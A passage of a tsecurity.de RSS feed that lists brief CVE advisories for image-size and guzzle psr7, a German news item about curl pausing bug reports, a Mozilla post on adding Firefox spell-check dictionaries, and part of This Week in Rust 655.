<description><![CDATA[A vulnerability, which was classified as problematic, was found in image-size up to 1.2.1/2.0.2. This impacts an unknown function of the component ICNS Parser. Such manipulation leads to infinite loop. This vulnerability only affects products that are no longer supported by the maintainer.

This ...]]></description>
<link>https://tsecurity.de/de/3601123/sicherheitsluecken/cve-2025-71330-image-size-up-to-121202-icns-parser-infinite-loop-nessus-id-321123/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601123/sicherheitsluecken/cve-2025-71330-image-size-up-to-121202-icns-parser-infinite-loop-nessus-id-321123/</guid>
<pubDate>Tue, 16 Jun 2026 10:37:01 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, was found in <a href="https://vuldb.com/product/image-size">image-size up to 1.2.1/2.0.2</a>. This impacts an unknown function of the component <em>ICNS Parser</em>. Such manipulation leads to infinite loop. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2025-71330">CVE-2025-71330</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-71319 | image-size up to 1.2.0/2.0.1 Image findBox infinite loop (GHSA-m5qc-5hw7-8vg7)]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in image-size up to 1.2.0/2.0.1. Affected by this issue is the function findBox of the component Image Handler. Such manipulation leads to infinite loop. This vulnerability only affects products that are no longer supported by the mai...]]></description>
<link>https://tsecurity.de/de/3600462/sicherheitsluecken/cve-2025-71319-image-size-up-to-120201-image-findbox-infinite-loop-ghsa-m5qc-5hw7-8vg7/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600462/sicherheitsluecken/cve-2025-71319-image-size-up-to-120201-image-findbox-infinite-loop-ghsa-m5qc-5hw7-8vg7/</guid>
<pubDate>Tue, 16 Jun 2026 03:03:43 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/image-size">image-size up to 1.2.0/2.0.1</a>. Affected by this issue is the function <code>findBox</code> of the component <em>Image Handler</em>. Such manipulation leads to infinite loop. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2025-71319">CVE-2025-71319</a>. The attack can be executed remotely. There is not any exploit available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[„Sommer der Glückseligkeit“: curl nimmt einen Monat lang keine Bug-Reports an]]></title>
<description><![CDATA[Seit Wochen kämpft der Maintainer von curl mit der Arbeitslast durch die Flut an KI-generierten Bug-Reports. Im Juli soll deshalb keiner angenommen werden.]]></description>
<link>https://tsecurity.de/de/3598785/it-nachrichten/sommer-der-glueckseligkeit-curl-nimmt-einen-monat-lang-keine-bug-reports-an/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598785/it-nachrichten/sommer-der-glueckseligkeit-curl-nimmt-einen-monat-lang-keine-bug-reports-an/</guid>
<pubDate>Mon, 15 Jun 2026 12:32:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Seit Wochen kämpft der Maintainer von curl mit der Arbeitslast durch die Flut an KI-generierten Bug-Reports. Im Juli soll deshalb keiner angenommen werden.]]></content:encoded>
</item>
<item>
<title><![CDATA[„Sommer der Glückseligkeit“: curl nimmt einen Monat lang keine Bug-Reports an]]></title>
<description><![CDATA[Seit Wochen kämpft der Maintainer von curl mit der Arbeitslast durch die Flut an KI-generierten Bug-Reports. Im Juli soll deshalb keiner angenommen werden.]]></description>
<link>https://tsecurity.de/de/3598747/it-security-nachrichten/sommer-der-glueckseligkeit-curl-nimmt-einen-monat-lang-keine-bug-reports-an/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598747/it-security-nachrichten/sommer-der-glueckseligkeit-curl-nimmt-einen-monat-lang-keine-bug-reports-an/</guid>
<pubDate>Mon, 15 Jun 2026 12:23:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Seit Wochen kämpft der Maintainer von curl mit der Arbeitslast durch die Flut an KI-generierten Bug-Reports. Im Juli soll deshalb keiner angenommen werden.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-48998 | guzzle psr7 up to 2.10.1 Message::parseRequest missing initialization (GHSA-34xg-wgjx-8xph / EUVD-2026-36239)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in guzzle psr7 up to 2.10.1. This impacts the function Message::parseRequest. The manipulation leads to missing initialization of a variable. This vulnerability only affects products that are no longer supported by the maintainer.

This ...]]></description>
<link>https://tsecurity.de/de/3591083/sicherheitsluecken/cve-2026-48998-guzzle-psr7-up-to-2101-messageparserequest-missing-initialization-ghsa-34xg-wgjx-8xph-euvd-2026-36239/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591083/sicherheitsluecken/cve-2026-48998-guzzle-psr7-up-to-2101-messageparserequest-missing-initialization-ghsa-34xg-wgjx-8xph-euvd-2026-36239/</guid>
<pubDate>Thu, 11 Jun 2026 17:36:35 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/guzzle:psr7">guzzle psr7 up to 2.10.1</a>. This impacts the function <code>Message::parseRequest</code>. The manipulation leads to missing initialization of a variable. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-48998">CVE-2026-48998</a>. It is possible to initiate the attack remotely. There is no exploit available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-49214 | guzzle psr7 up to 2.10.1 deserialization (GHSA-hq7v-mx3g-29hw / EUVD-2026-36240)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in guzzle psr7 up to 2.10.1. Affected is an unknown function. The manipulation results in deserialization. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is known as CVE-2026-49214....]]></description>
<link>https://tsecurity.de/de/3591082/sicherheitsluecken/cve-2026-49214-guzzle-psr7-up-to-2101-deserialization-ghsa-hq7v-mx3g-29hw-euvd-2026-36240/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591082/sicherheitsluecken/cve-2026-49214-guzzle-psr7-up-to-2101-deserialization-ghsa-hq7v-mx3g-29hw-euvd-2026-36240/</guid>
<pubDate>Thu, 11 Jun 2026 17:36:34 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/guzzle:psr7">guzzle psr7 up to 2.10.1</a>. Affected is an unknown function. The manipulation results in deserialization. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-49214">CVE-2026-49214</a>. It is possible to launch the attack remotely. No exploit is available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[Pascal Chevrel: Spell-checking for more Firefox users — a community effort]]></title>
<description><![CDATA[A while back, I stumbled onto something that turned into a rewarding side-project at Mozilla.

Firefox ships with a built-in spellchecker, but it only activates if a dictionary for your language is bundled with the browser. Coverage had grown organically over the years — driven largely by localiz...]]></description>
<link>https://tsecurity.de/de/3590866/tools/pascal-chevrel-spell-checking-for-more-firefox-users-a-community-effort/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590866/tools/pascal-chevrel-spell-checking-for-more-firefox-users-a-community-effort/</guid>
<pubDate>Thu, 11 Jun 2026 16:24:27 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A while back, I stumbled onto something that turned into a rewarding side-project at Mozilla.</p>

<p>Firefox ships with a built-in spellchecker, but it only activates if a dictionary for your language is bundled with the browser. Coverage had grown organically over the years — driven largely by localizers and community members adding support for their own languages. Dictionary work was actually very active in the early years of the Mozilla project, but like many things in a large open-source codebase with a lot to manage, it had quietly received less attention over time, for no particularly good reason. So I decided to change that.</p>

<h3>Taking stock</h3>

<p>I put together a full <a href="https://vanilla.pascalc.net/dictionaries/">inventory dashboard</a> of every third-party dictionary shipped in Firefox Desktop, cataloguing sources, upstream health, and — critically — licensing.</p>

<p>Licensing turns out to be the main bottleneck. Firefox is open-source software, so any dictionary we ship has to carry a licence compatible with the Mozilla codebase. Some excellent dictionaries exist for languages Firefox supports, but their licences don't allow direct inclusion. In those cases, the dictionary can still reach users — but only as a Firefox extension they have to find and install manually, rather than something that just works out of the box.</p>

<p>The goal of the inventory wasn't to point fingers at anything. It was to make the full picture visible, so that anyone who wanted to help would know exactly where to start.</p>

<h3>Plugging into the community</h3>

<p>Once the inventory existed, the work was really about connecting the right people. Mozilla's localizer community already had the expertise and motivation — what was sometimes missing was a clear entry point. I took care of all the patches myself, so that localizers wouldn't have to deal with the technical side of things. This work was done in coordination with Mozilla's Localization drivers team, who own the dictionary infrastructure and reviewed and merged the changes.</p>

<h3>The results</h3>

<p>We expanded the number of locales shipping with a built-in dictionary <strong>from 30 to 41</strong>. This shipped last week with Firefox 151.0.3, and these improvements also benefit Thunderbird users, since both applications share the same dictionary infrastructure.</p>

<p>New dictionaries added: Croatian, English (UK), Georgian, Persian, Slovenian, Tajik, Tamil, Tibetan, Turkish, Welsh, and Xhosa.</p>

<p>Updated dictionaries: Bulgarian, Danish, French, Hungarian, Indonesian, Latvian, Polish, Romansh, and Swedish.</p>

<h3>Stirring the pot</h3>

<p>Part of the reason for doing this work publicly — building the inventory, filing the bugs, making the gaps visible — was to give people with the right expertise a reason to step in themselves. That's exactly what happened.</p>

<p>For Turkish and Russian, the existing open-source Hunspell dictionaries had become outdated — vocabulary and linguistic rules that hadn't kept pace with how the languages are actually used today. Selim (our Turkish l10n lead) and Valentin (our Russian l10n lead) each decided to take matters into their own hands.</p>

<p>Selim forked the <a href="https://github.com/tdd-ai/hunspell-tr">TDD Turkish dictionary</a> and updated it with modern vocabulary, better circumflex support, and performance improvements — the result is <a href="https://github.com/selimsum/hunspell-tr-moz">hunspell-tr-moz</a>, now shipping in Firefox 151.0.3. Valentin built a new modern Russian dictionary from scratch, <a href="https://github.com/Goudron/ru-spelling-dictionary">ru-spelling-dictionary</a>, released under MPL-2.0. It's currently available as a <a href="https://addons.mozilla.org/en-US/firefox/addon/russian-spell-dictionary/">Firefox extension</a> — if you use Russian, Valentin would appreciate feedback on the quality before it's integrated directly into Firefox.</p>

<p>Both projects are public and open-source.</p>

<h3>What's still in the pipeline</h3>

<p>The licence question is also quietly resolving itself for a couple more locales. The maintainers of the Kabyle and Asturian dictionaries have agreed to relicense their work to allow direct inclusion in Firefox. Once that's done, those communities will join the list too.</p>

<p>There are still gaps in the inventory. Some are licence issues that may resolve over time. But for many of the remaining locales, the honest answer is that we simply haven't looked hard enough yet. Dictionaries are often individual passion projects or work coming out of linguistics circles — they exist, but finding them takes investigation. If you know of a dictionary for a language Firefox doesn't currently support, that's exactly the kind of lead worth following up on.</p>

<h3>An open invitation</h3>

<p>Mozilla is still a place where a motivated contributor can find a corner of the project, do meaningful work, and have a real impact — without needing to be a browser engineer or a Mozilla insider.</p>

<p>The <a href="https://vanilla.pascalc.net/dictionaries/">inventory dashboard</a> is public. If you're a localizer, a linguist, or a dictionary maintainer and you want to help bring spellchecking to more Firefox users, the gaps are clearly documented. And if you maintain a dictionary that could be included but licensing is an obstacle, that's a conversation worth having.</p>

<p>See you in May 2027 for the next update.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 655]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3589813/tools/this-week-in-rust-this-week-in-rust-655/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589813/tools/this-week-in-rust-this-week-in-rust-655/</guid>
<pubDate>Thu, 11 Jun 2026 10:13:12 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#official">Official</a></h5>
<ul>
<li><a href="https://blog.rust-lang.org/inside-rust/2026/06/04/how-josh-helps-rust-manage-code-across-multiple-repositories/">How Josh helps Rust manage code across multiple repositories</a></li>
<li><a href="https://blog.rust-lang.org/inside-rust/2026/06/03/maintainer-spotlight-tiffany-pek-yuan-tiif/">Maintainer spotlight: Tiffany Pek Yuan (@tiif)</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#newsletters">Newsletters</a></h5>
<ul>
<li><a href="https://rust-osdev.com/this-month/2026-05/">This Month in Rust OSDev: May 2026</a></li>
<li><a href="https://www.theembeddedrustacean.com/p/the-embedded-rustacean-issue-73">The Embedded Rustacean Issue #73</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://kerkour.com/stdx">Announcing stdx, Rust's extended standard library</a></li>
<li><a href="https://medium.com/p/dc57a4631f8b?postPublishedType=initial">OmniScope 0.2.0 released:FFI static detection tool based on LLVM IR</a></li>
<li><a href="https://asterinas.github.io/2026/06/04/announcing-asterinas-0.18.0.html">Announcing Asterinas 0.18.0</a></li>
<li><a href="https://github.com/wilsonglasser/oryxis/releases/tag/v0.8.0">Oryxis SSH 0.8: split panes</a></li>
<li><a href="https://ratatui.rs/highlights/v0301/">Ratatui 0.30.1 is released - a Rust library for cooking up terminal user interfaces</a></li>
<li><a href="https://utoo.land/en/docs/blog/utoopack-intro">@utoo/pack: A Next-Generation Build Tool Based on Turbopack</a></li>
<li><a href="https://felipebalbi.github.io/pico-de-gallo/">Pico de Gallo - a USB-attached protocol bridge for developing embedded-hal drivers on your laptop</a></li>
<li><a href="https://kunobi.ninja/blog/kache-v0-5-0">kache 0.5.0: designing a correct compile-cache key</a></li>
<li><a href="https://www.veszelovszki.com/a/smb2/">Announcing smb2: a very fast pure-Rust SMB2/3 client</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li><a href="https://smallcultfollowing.com/babysteps/blog/2026/06/09/only-bounds/">Only Bounds</a></li>
<li><a href="https://wasmer.io/posts/ported-wasmer-backend-django-to-rust">Porting our Django backend to Rust improved the infra usage by 90%</a></li>
<li><a href="https://wubingzheng.github.io/en/Decimal-Crates-Comparison.html">Decimal Crates Comparison and Benchmark</a> | <a href="https://wubingzheng.github.io/zh/Decimal-Crates-Comparison.html">Chinese version</a></li>
<li><a href="https://teaql.io/blog/robot-task-board-showcase/">TeaQL Robot Task Board: a Rust TUI showcase for auditable business workflows</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=QFQkqFSg8Z4">Rayon is NOT for games - use this instead</a></li>
<li>[audio] <a href="https://corrode.dev/podcast/s06e05-veo/">Veo with Anders Hellerup Madsen and Gorm Casper</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li>[series] <a href="https://aibodh.com/posts/async-rust-chapter-1-hands-on-intro-to-async-rust/">Who Runs Your Rust Future? Hands-On Intro to Async Rust</a></li>
<li><a href="https://villagesql.com/blog/rust/">Extend MySQL Using Rust</a></li>
<li><a href="https://blog.sheerluck.dev/posts/learn-rust-smart-pointers-and-interior-mutability-by-building-git-commit-graph-viewer/">Learn Rust Smart Pointers and Interior Mutability by Building Git Commit Graph Viewer</a></li>
<li><a href="https://rustarians.com/heap-underflow/">heap underflow: classic algorithm solutions in idiomatic Rust, runnable in the browser</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://github.com/handewo/rustion">rustion</a>, a SSH bastion server.</p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1610">handewo</a> for the self-suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>

<ul>
<li><a href="https://github.com/ansidium/cuda-oxide-windows/issues/1">cuda-oxide Windows fork - test the Windows MSVC release on more CUDA/Windows setups</a></li>
<li><a href="https://github.com/MrSheerluck/openslate/issues/38">openslate - add unit tests for slugify() in api/src/notes.rs</a></li>
<li><a href="https://github.com/MrSheerluck/openslate/issues/70">openslate - add integration tests for notes CRUD in api/src/notes.rs</a></li>
<li><a href="https://github.com/MrSheerluck/openslate/issues/96">openslate - add integration tests for auth flow in api/src/users.rs</a></li>
<li><a href="https://github.com/MrSheerluck/openslate/issues/89">openslate - add unit tests for build_fts_query() in api/src/search.rs</a></li>
<li><a href="https://github.com/MrSheerluck/openslate/issues/106">openslate - add integration tests for auth middleware and logout in api/src/auth.rs</a></li>
<li><a href="https://github.com/MrSheerluck/openslate/issues/85">openslate - add integration tests for media endpoints (DB layer) in api/src/media.rs</a></li>
<li><a href="https://github.com/MrSheerluck/openslate/issues/40">openslate - add unit tests for ext_from_mime() and filename_from_url() in api/src/media.rs</a></li>
<li><a href="https://github.com/satyakwok/reliakit/issues/91">reliakit - add a typed_csv example to the umbrella crate</a></li>
<li><a href="https://github.com/satyakwok/reliakit/issues/92">reliakit - implement CsvField for char</a></li>
<li><a href="https://github.com/satyakwok/reliakit/issues/107">reliakit - implement CsvField for the core::net address types</a></li>
<li><a href="https://github.com/satyakwok/reliakit/issues/95">reliakit - write a short "which resilience block do I use?" guide</a></li>
<li><a href="https://github.com/satyakwok/reliakit/issues/94">reliakit - extract a reusable rolling-window counter from RollingBreaker</a></li>
</ul>



<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>



<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>526 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-06-02..2026-06-09">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/157016">add <code>extern "tail"</code> calling convention</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/148820">add very basic "comptime" fn implementation</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157009">avoid <code>unreachable_code</code> on required return values</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157540">cleanup and optimize <code>render_impls</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156155">macros: report unbound metavariables directly</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157252">rewrite <code>rustc_span::symbol::Interner</code> to avoid double hashing</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155338">staticlib hide internal symbols</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/154742">add APIs for case folding to the standard library</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/154608">add <code>_value</code> API for number literals in proc-macro</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156119">further optimize <code>SliceIndex&lt;str&gt;</code> impl for <code>Range&lt;usize&gt;</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/143511">improve TLS codegen by marking the panic/init path as cold</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155607">perf: use <code>get_unchecked</code> for <code>TwoWaySearcher</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156840">stabilize <code>PathBuf::into_string</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156222">stabilize <code>Result::map_or_default</code> and <code>Option::map_or_default</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/cargo/pull/17081">strip CR from <code>cargo:token-from-stdout</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rustdoc">Rustdoc</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/157262">IXCRE: preserve sizedness bounds on type params belonging to the parent item</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157438">don't link <code>doc(hidden)</code> associated type projections</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157233">fix trait impl ordering</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157310">render <code>impl</code> restriction</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17122">support <code>iter_mut</code> in <code>ITER_NEXT_SLICE</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17173"><code>borrowed_box</code>: clean-up, improve suggestion message</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17144"><code>double_must_use</code>: make the lint machine-applicable in single-attribute case</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17174"><code>iter_cloned_collect</code>: split off the suggestion from the main message</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17037">add <code>manual_isolate_lowest_one</code> lint</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17146">detect more ranges in <code>single_range_in_vec_init</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17131">do not trigger <code>inline_trait_bounds</code> on auto-derived code</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17031">extend <code>extra_unused_lifetimes</code> for spurious <code>for&lt;'a&gt;</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17141"><code>large_const_arrays</code>: check nested large arrays</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17023">fix <code>explicit_counter_loop</code> false positive when the counter is only modified inside the <code>else</code> block of <code>let...else</code> binding</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17130">fix <code>result_large_err</code> and <code>result_unit_err</code> not triggering on async functions</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17181">fix <code>unused_async_trait_impl</code> suggestions with return statements</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17164">fix lints duplications in <code>unknown_attribute</code> and <code>renamed_builtin_attr</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17121">obtaining the metadata of a const pointer is a const operation</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17135">perf: avoid cloning associated items in <code>empty_line_after</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17168">perf: skip the <code>boxed_local</code> walk for functions without a Box parameter</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17137">perf: skip the <code>inline_always</code> relevance walk for items without the attribute</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22469"><code>feat(diagnostics)</code>: emit error for infer vars in non-inference contexts</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22505">adopt uv's AI policy</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22495">distribute windows builts with mimalloc</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22481">lower field defaults to <code>rustc_type_ir::Const</code>s</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22522"><code>RunnableKind::Test</code> should map to <code>project_json::RunnableKind::TestOne</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22523"><code>extract_function</code> misses <code>&amp;mut</code> for <code>container[i].mut_method()</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22520">do not emit a "type annotations needed" error on <code>include_bytes!()</code> where the array length cannot be inferred</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22519">no generate unused generic params in trait sign</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22524">parse OR pattern types</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22444">rename schema subItems with <code>sub_items</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22448">implement <code>rust-analyzer/evaluatePredicate</code> lsp extension</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22512">parse unnamed <code>enum</code> variants</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>A fairly noisy week, with a bunch of small regressions contained within,
leading to a slight increase on average in instruction counts. This week had a
lot of large rollups, likely due to some CI problems, but thankfully many of
those came with pre-triaged perf results by the time (thank you to those
triagers!). Roughly similar slight regressions for cycles and wall times across
the week.</p>
<p>Triage done by <strong>@simulacrum</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=4804ad7e93e1b31f4605b7083871d0d3d85a2afe&amp;end=f3ef3bd882dd24a275a60701a67c3bb330edd8c1&amp;absolute=false&amp;stat=instructions%3Au">4804ad7e..f3ef3bd8</a></p>
<p>2 Regressions, 0 Improvements, 10 Mixed; 5 of them in rollups
32 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/master/triage/2026/2026-06-08.md">Full report here</a></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
